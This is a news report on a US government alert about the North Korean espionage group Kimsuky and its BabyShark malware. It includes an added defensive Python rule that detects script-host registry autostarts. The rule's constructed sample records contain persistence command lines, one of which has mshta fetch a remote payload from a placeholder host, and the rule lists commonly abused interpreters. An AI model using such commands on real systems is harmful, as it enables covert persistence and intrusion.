
Kimsuky APT Hackers Attacking Private Businesses
The Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the U.S. Cyber Command Cyber National Mission Force (CNMF) issued a joint alert (AA20-301A) regarding North Korean cyber attacks. The alert warns of cyber attacks by a North Korean hacking group referred to as Kimsuky.
Kimsuky threat actors carry out cyber espionage attacks on individual experts and private sector businesses in South Korea, Japan, and the United States. The group's typical targets are individuals recognized as experts in their field, think tanks, and South Korean government entities.
“CISA, FBI, and CNMF recommend that individuals and organizations with this target profile increase their defenses and adopt a heightened state of awareness. Important mitigations include safeguards against spear phishing, enabling multi-factor authentication, and user awareness training,” says the joint alert.
BabyShark doo, doo, doo, doo, doo, doo
Kimsuky deploys BabyShark malware via a phishing message tailored to the target's interests. The email contains a malicious link or attachment that lures the victim into downloading the malware. After obtaining initial access, Kimsuky uses BabyShark to modify registry keys on the infected computer, download additional files, execute commands, and perform other malicious actions.
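The registry modification described above is the kind of behaviour a defender can hunt for in endpoint telemetry. The script below is an added example, not code from the advisory or from any Kimsuky sample: it runs a small detection rule over constructed, Sysmon-style "registry value set" (Event ID 13) records and flags autostart entries under a Run or RunOnce key whose command launches a script host. The sample records, the key=value line format, and the choice to focus on Run keys and on script hosts such as mshta.exe and wscript.exe are assumptions made for the example; the page itself only says that BabyShark alters registry keys.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample records in a Sysmon "Registry value set" (Event ID 13)
# style, flattened to key=value text. Invented for this example; not real
# telemetry from any intrusion.
SAMPLE_EVENTS = [
    r"EventID=13 Image=C:\Windows\System32\wscript.exe TargetObject=HKU\S-1-5-21-1111\Software\Microsoft\Windows\CurrentVersion\Run\WinUpdate Details=wscript.exe //E:vbscript C:\Users\alice\AppData\Roaming\update.txt",
    r"EventID=13 Image=C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe TargetObject=HKU\S-1-5-21-1111\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive Details=C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background",
    r"EventID=13 Image=C:\Windows\explorer.exe TargetObject=HKU\S-1-5-21-1111\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden Details=DWORD (0x00000001)",
    r"EventID=13 Image=C:\Windows\System32\mshta.exe TargetObject=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Stage2 Details=mshta.exe http://example.invalid/payload.hta",
]

# Autostart locations to watch (assumption: Run/RunOnce are the common case).
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\(Run|RunOnce)\\", re.IGNORECASE)

# Interpreters commonly abused to launch script-based first stages. Which hosts
# to watch is a tuning decision for the example, not something the page states.
SCRIPT_HOSTS = ("mshta", "wscript", "cscript", "powershell", "regsvr32", "rundll32", "cmd.exe")


@dataclass
class Alert:
    value_name: str   # name of the autostart value that was written
    image: str        # process that wrote it
    details: str      # command line stored in the value
    reason: str


def parse_event(line: str) -> Dict[str, str]:
    """Split 'Key=value Key=value ...' text where values may contain spaces.

    Keys are single words immediately followed by '=', so we split on the
    whitespace that precedes such a key rather than on every space.
    """
    fields: Dict[str, str] = {}
    for chunk in re.split(r"\s+(?=\w+=)", line.strip()):
        key, _, value = chunk.partition("=")
        fields[key] = value
    return fields


def classify(event: Dict[str, str]) -> Optional[Alert]:
    """Return an Alert if the event writes a script-host autostart, else None."""
    if event.get("EventID") != "13":
        return None
    target = event.get("TargetObject", "")
    if not RUN_KEY_RE.search(target):
        return None  # not an autostart key; ignore
    details = event.get("Details", "")
    lowered = details.lower()
    host = next((h for h in SCRIPT_HOSTS if h in lowered), None)
    if host is None:
        return None  # ordinary autostart (e.g. a signed application binary)
    return Alert(
        value_name=target.rsplit("\\", 1)[-1],
        image=event.get("Image", ""),
        details=details,
        reason=f"Run-key autostart launches script host '{host}'",
    )


def scan(lines: List[str]) -> List[Alert]:
    """Run the rule over every record and collect the hits."""
    return [a for a in (classify(parse_event(line)) for line in lines) if a is not None]


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(f"[ALERT] {alert.value_name}: {alert.reason}")
        print(f"        written by: {alert.image}")
        print(f"        command:    {alert.details}")
```

On the constructed input the rule flags the two autostart values that invoke wscript.exe and mshta.exe and leaves the OneDrive entry and the unrelated Explorer setting alone. In production the same logic would read from a SIEM or from Sysmon's XML directly, and the script-host list and any allowlist of known-good autostart commands would need tuning for the environment; a rule like this catches one persistence path, not every technique a group with Kimsuky's toolset might use.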
Kimsuky also uses GREASE malware.
However, email phishing isn’t the only way Kimsuky compromises targets. The advanced persistent threat group has also used watering hole attacks and spread malware on torrent sharing sites. In 2018, the hackers used a Google Chrome extension to infect victims’ computers and steal passwords from their web browsers.
The threat actors have also sent emails impersonating South Korean reporters.
Kimsuky Advanced Persistent Threat Group
The United States Federal Government refers to North Korean state sponsored malicious cyber activity as HIDDEN COBRA. Kimsuky is an advanced persistent threat (APT) group that carries out cyber espionage attacks on private sector businesses on behalf of the North Korean government. The hackers use spear phishing to trick targets and gain access to hosts or networks so they can steal information.
It is believed that Kimsuky hackers have been active since about 2012.
To report Kimsuky activity or other malicious cyber activity related to this Joint Cybersecurity Advisory, contact your local FBI field office at www.fbi.gov/contact-us/field, the FBI's 24/7 Cyber Watch (CyWatch) at (855) 292-3937, or by e-mail at CyWatch@fbi.gov.